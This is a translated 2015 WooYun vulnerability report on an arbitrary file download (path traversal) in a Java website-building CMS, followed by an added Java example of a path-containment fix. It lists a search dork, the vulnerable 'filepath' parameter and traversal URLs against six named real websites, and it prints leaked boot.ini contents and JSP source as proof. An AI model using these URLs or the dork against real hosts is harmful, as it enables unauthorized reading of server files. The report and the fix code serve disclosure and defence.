Arbitrary file download in a certain website-building system

ID: 115521
URL: http://www.wooyun.org/bug.php?action=view&id=115521
Vulnerability status: handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling
Title: Arbitrary file download in a certain website-building system
Vulnerability type: arbitrary file traversal/download
Vendor: cnvd
White hat: Hero
Submitted: 2015-05-22 14:58:00
Published: 2015-08-24 13:40:00
Fix time: (not set)
Confirmed: 2015-05-26 00:00:00
Confirm Spend: 4
Tags: file-operation parameter not filtered
Followers: 0
Favorites: 0
White-hat rating:
White-hat self-assessed rank: 20
Vendor rating:
Vendor-assessed rank: 10
Summary
"Why do you have my source code?"
"And that's my fault?"
Details

WooYun: Generic SQL injection in a certain website-building system #2
Same system again.
It also has an arbitrary file download.
Affected sites include the China Science and Technology Education Network and some foreign-trade websites.
Keyword: inurl:contentmanager.do?method=view
Vulnerable page: webedit/uploadfile.do?action=open&filepath=
Instances:
http://www.cnstedu.cn/webedit/uploadfile.do?action=open&filepath=../../../../cms/cmsapp/search.jsp
http://kxsz.gdec.net/webedit/uploadfile.do?action=open&filepath=../../../../cms/cmsapp/search.jsp
http://www.cimuset.org/webedit/uploadfile.do?action=open&filepath=../../../../cms/cmsapp/search.jsp
http://www.fdstmc.org.cn/webedit/uploadfile.do?action=open&filepath=../../../../cms/cmsapp/search.jsp
http://www.chinaworldmall.cn/webedit/uploadfile.do?action=open&filepath=../../../../cms/cmsapp/search.jsp
http://www.sqkpym.org.cn/webedit/uploadfile.do?action=open&filepath=../../../../cms/cmsapp/search.jsp
www.cnstedu.cn

...

POC

boot.ini

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(1)partition(2)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(1)partition(2)\WINDOWS="Windows Server 2003, Enterprise" /noexecute=optout /fastdetect


cms/cmsapp/search.jsp

<%@ page import="com.jalor.cms.column.CMSColumn,
com.jalor.util.treemodel.FolderPath,
com.jalor.util.Function,
com.jalor.cms.actionform.ContentForm,
com.jalor.cms.actionform.ContentAttachmentForm,
com.jalor.cms.content.ContentAttachment,
java.util.Collection,
java.util.Iterator,
java.util.Properties,
com.jalor.cms.actionform.ColumnForm"%>
<%@ page contentType="text/html;charset=GBK" language="java" %>
<%@ taglib uri = "/WEB-INF/jalorportal.tld" prefix = "portal"%>
<%@ taglib uri = "/WEB-INF/jalorcms.tld" prefix = "cms"%>
<%@ taglib uri="/WEB-INF/struts-html.tld" prefix="html" %>
<%@ taglib uri="/WEB-INF/struts-bean.tld" prefix="bean" %>
<%@ taglib uri="/WEB-INF/struts-logic.tld" prefix="logic" %>
<%@include file="/include/currentuserinfo.jsp"%>
<%@include file="/include/pageexpires.jsp"%>
<%@include file="/include/filepath.jsp"%>
<%
ColumnForm column=(ColumnForm)request.getAttribute("CMSColumnForm");
String url="";
%>
<portal:moduleconfig>
<logic:iterate id="pathinfo" name="columnpath" scope="request">
<%
FolderPath folderPath=(FolderPath)pageContext.getAttribute("pathinfo");
String name=folderPath.getFoldername();
url="/cms/columnmanager.do?method=list&id="+folderPath.getFolderid();
%>
<portal:navigation name="<%=name%>" url="<%=url%>"/>
</logic:iterate>
<%
String columnurl="/cms/columnmanager.do?method=list&id="+column.getId();
%>
<portal:navigation name="<%=column.getName()%>" url="<%=columnurl%>"/>
<portal:pagetab name="搜索" url=""/>
<portal:toolbutton name="返回" url="<%=columnurl%>" image=""/>
</portal:moduleconfig>
<portal:standardstyle insertTemplate="standardheader.vm"/>
<script language="javascript">
</script>
<form action="/cms/contentattachment" method="post">
<input type="hidden" name="method" value="search">
<input type="hidden" name="columnid" value="<%=column.getId()%>">
<table width="90%" bordercolorlight="#000000" bordercolordark="#ffffff" class="labeltable_middle_table">
<tr>
<td class="labeltable_middle_td" align="center">标题</td>
<td class="labeltable_middle_td" align="center">作者</td>
</tr>
<%
Collection lstResult=(Collection)request.getAttribute("resultset");
for(Iterator it=lstResult.iterator();it.hasNext();)
{
Properties prop=(Properties)it.next();
%>
<tr>
<td><a href="/cms/contentmanager.do?method=edit&pageid=edit&columnid=<%=column.getId()%>&templateid=<%=column.getTemplateid()%>&id=<%=prop.getProperty("contentid")%>"><%=prop.getProperty("title","")%></a></td>
<td><%=prop.getProperty("author","")%></td>
</tr>
<%
}
%>
</table>
</form>
<portal:standardstyle insertTemplate="standardfooter.vm" />


Fix recommendation

Restrict directory permissions?
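A path-containment check of the kind this fix needs, added here as an example rather than as the vendor's code; the class name SafeUploadOpen, the upload-root layout and the sample file are assumptions:

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;

// Hardened resolver for an "open uploaded file" endpoint such as
// webedit/uploadfile.do?action=open&filepath=... (added example, not the vendor's code).
// The reported flaw: filepath is joined to the upload directory with no check that
// the resulting path still lies inside it, so ../../ walks to any readable file.
public final class SafeUploadOpen {
    private final Path uploadRoot;

    public SafeUploadOpen(Path uploadRoot) throws IOException {
        // Canonicalize once so every comparison below is against the real directory.
        this.uploadRoot = uploadRoot.toRealPath();
    }

    // Returns the file to serve, or throws if the request escapes the upload root.
    public Path resolve(String filepath) throws IOException {
        if (filepath == null || filepath.isEmpty() || filepath.indexOf('\0') >= 0) {
            throw new IllegalArgumentException("invalid filepath");
        }
        // resolve() keeps an absolute filepath as-is, so the startsWith check below
        // also rejects requests that try to replace the root outright (e.g. C:\boot.ini).
        Path candidate = uploadRoot.resolve(filepath).normalize();
        if (!candidate.startsWith(uploadRoot)) {
            throw new SecurityException("path traversal rejected: " + filepath);
        }
        // Follow symlinks planted inside the upload directory and require a plain file.
        Path real = candidate.toRealPath();
        if (!real.startsWith(uploadRoot) || !Files.isRegularFile(real)) {
            throw new SecurityException("path traversal rejected: " + filepath);
        }
        return real;
    }

    public static void main(String[] args) throws IOException {
        Path root = Files.createTempDirectory("uploads");       // constructed sample upload root
        Files.writeString(root.resolve("report.pdf"), "sample"); // constructed sample upload
        SafeUploadOpen open = new SafeUploadOpen(root);
        System.out.println("served: " + open.resolve("report.pdf"));
        try {
            open.resolve("../../../../cms/cmsapp/search.jsp");  // the traversal from the report
        } catch (SecurityException e) {
            System.out.println(e.getMessage());
        }
    }
}
```

The two-stage check (normalize, then toRealPath) matters because a symlink inside the upload directory can pass the first comparison and still point outside it.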

Status information
2015-05-22: Details have been sent to the vendor and are awaiting the vendor's handling
2015-05-26: Vendor has confirmed; details are disclosed to the vendor only
2015-05-29: Details opened to third-party security partners
2015-07-20: Details disclosed to core white hats and relevant domain experts
2015-07-30: Details disclosed to regular white hats
2015-08-09: Details disclosed to intern white hats
2015-08-24: Details disclosed to the public
Vendor reply: CNVD has confirmed the described vulnerability; no direct handling channel with the software's producing vendor has been established yet, pending claim.
Response information: Severity: High; Vulnerability Rank: 10; Confirmed: 2015-05-26 13:38